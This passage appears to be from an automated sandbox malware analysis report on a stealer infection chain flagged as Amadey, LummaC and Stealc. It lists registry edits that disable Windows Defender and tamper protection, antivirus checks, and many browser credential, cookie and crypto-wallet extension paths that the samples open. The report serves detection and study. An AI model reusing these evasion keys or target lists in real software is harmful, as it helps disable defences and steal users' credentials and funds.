Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002538001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002538001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: 58ce8f976c.exe, 0000000C.00000003.3201552486.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: file.exe, file.exe, 00000000.00000003.2231556673.0000000001547000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269022223.0000000001538000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2231556673.000000000155A000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2971263867.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3165170457.0000000005941000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2965626159.0000000005941000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3093935031.0000000005942000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3179090240.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 4.2.S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.DP4Z2JGIRNCYT3CKHONMY.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2386839542.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3207148284.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2465363519.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3249445453.00000000009F1000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2425000445.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2427095696.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2711130539.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 760934cb92.exe PID: 7144, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 1880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 6068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 504, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 32.2.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3135249068.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2960373733.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.3127862196.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3268929874.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3144922950.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3001129617.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3116653245.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.3280933460.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3274363852.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7451ae0b11.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: Wallets/Electrum
Source: file.exe String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: file.exe String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.2173815846.0000000001569000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: file.exe, 00000000.00000003.2218538984.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: file.exe, 00000000.00000003.2218579742.0000000001538000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
